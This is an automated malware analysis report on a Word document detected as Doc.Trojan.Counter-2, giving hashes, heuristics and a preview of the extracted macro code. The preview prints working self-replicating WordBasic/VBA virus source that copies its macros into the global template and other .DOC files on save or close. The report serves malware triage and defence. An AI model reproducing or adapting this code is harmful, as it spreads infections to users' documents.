Office (OLE) malware analysis — malicious · 3e47d4514d352fde

MALICIOUS

Office (OLE)

50.0 KB Created: 2000-01-07 18:11:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 29f9f59addc5234656bd3d2dd285fea4 SHA-1: d2967fa26e5ae2a66bab87f09e38fa1fedcf8850 SHA-256: 3e47d4514d352fde733b0053ae6bb598044a7f60b1f8da30c3fef6cfb43a8683

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The file contains legacy WordBasic macro markers and VBA macros, indicating it is designed to infect other documents. The ClamAV detection 'Doc.Trojan.Counter-2' strongly suggests malicious intent. The macro code attempts to copy itself to other documents and save them, consistent with a macro-based worm.

Heuristics 3

ClamAV: Doc.Trojan.Counter-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Counter-2
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5701 bytes
SHA-256: `39b04e4b535e05e48562c10dbf7c67be4f289dbc338ab8e3bbf5d780e4f303ba`
Detection ClamAV: Doc.Trojan.Counter-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "FileSave" Public Sub MAIN() Dim DestFile$ Dim MacroFile$ Dim Test Dim Text_$ Dim Number Dim Space_$ ' ---------------------------- ' \| Written by Guy Incognito \| ' \| Bedford, England \| ' \| on 26/09/97 \| ' ---------------------------- On Error Resume Next DestFile$ = WordBasic.[SelectionFileName$]() MacroFile$ = WordBasic.[MacroFileName$]() WordBasic.ToolsOptionsSave GlobalDotPrompt:=0 If MacroFile$ = DestFile$ Then GoTo InfectGlobal InfectDoc: If WordBasic.[FileNameInfo$](DestFile$, 3) = "" Then GoTo NoInfect Test = InStr(DestFile$, ".DOC") If Test = 0 Then GoTo NoInfect Text_$ = WordBasic.[MacroDesc$]("Generation") If Len(Text_$) > 14 Then Text_$ = "0" Number = WordBasic.Val(Text_$) + 1 Space_$ = Str(Number) Text_$ = WordBasic.[LTrim$](Space_$) WordBasic.ToolsMacro Name:="Generation", Description:=Text_$, SetDesc:=1 WordBasic.MacroCopy "FileClose", DestFile$ + ":FileClose" WordBasic.MacroCopy "FileSave", DestFile$ + ":FileSave" WordBasic.MacroCopy "ToolsMacro", DestFile$ + ":ToolsMacro" WordBasic.MacroCopy "FileTemplates", DestFile$ + ":FileTemplates" WordBasic.MacroCopy "FileExit0", DestFile$ + ":FileExit" WordBasic.MacroCopy "Generation", DestFile$ + ":Generation" Rem But all I wanna do is reproduce, man! Rem If Second(Now()) <> 30 Then Goto NoEncrypt Rem Key$ = GetSystemInfo$(26) Rem FileSaveAs .Name = DestFile$, .Format = 1, .Password = Key$ Rem Goto Exit NoEncrypt: WordBasic.FileSaveAs Name:=DestFile$, Format:=1 GoTo Exit_ InfectGlobal: Text_$ = WordBasic.[MacroDesc$]("Generation") If Len(Text_$) > 14 Then Text_$ = "0" Number = WordBasic.Val(Text_$) + 1 Space_$ = Str(Number) Text_$ = WordBasic.[LTrim$](Space_$) WordBasic.ToolsMacro Name:="Generation", Description:=Text_$, SetDesc:=1 WordBasic.MacroCopy DestFile$ + ":FileClose", "FileClose" WordBasic.MacroCopy DestFile$ + ":FileSave", "FileSave" WordBasic.MacroCopy DestFile$ + ":ToolsMacro", "ToolsMacro" WordBasic.MacroCopy DestFile$ + ":FileTemplates", "FileTemplates" WordBasic.MacroCopy DestFile$ + ":FileExit", "FileExit0" WordBasic.MacroCopy DestFile$ + ":Generation", "Generation" NoInfect: WordBasic.FileSave Exit_: End Sub Attribute VB_Name = "ToolsMacro" Public Sub MAIN() Attribute MAIN.VB_Description = "Runs, creates, deletes, or revises a macro" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.ToolsMacro.MAIN" Rem You didn't say the magic word. End Sub Attribute VB_Name = "FileTemplates" Public Sub MAIN() Attribute MAIN.VB_Description = "Changes the active template and the template options" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileTemplates.MAIN" Rem Not in thledentitl Attribute VB_Name = "FileClose" Public Sub MAIN() Attribute MAIN.VB_Description = "Saves the active document or template" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileClose.MAIN" Dim DestFile$ Dim MacroFile$ Dim Test Dim Text_$ Dim Number Dim Space_$ ' ---------------------------- ' \| Written by Guy Incognito \| ' \| Bedford, England \| ' \| on 26/09/97 \| ' ---------------------------- On Error Resume Next DestFile$ = WordBasic.[SelectionFileName$]() MacroFile$ = WordBasic.[MacroFileName$]() WordBasic.ToolsOptionsSave GlobalDotPrompt:=0 If MacroFile$ = DestFile$ Then GoTo InfectGlobal InfectDoc: If WordBasic.[FileNameInfo$](DestFile$, 3) = "" Then GoTo NoInfect Test = InStr(DestFile$, ".DOC") If Test = 0 Then GoTo NoInfect Text_$ = WordBasic.[MacroDesc$]("Generation") If Len(Text_$) > 14 Then Text_$ = "0" Number = WordBasic.Val(Text_$) + 1 Space_$ = Str(Number) Text_$ = WordBasic.[LTrim$](Space_$) WordBasic.ToolsMacro Name:="Generation", Description:=Tex ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.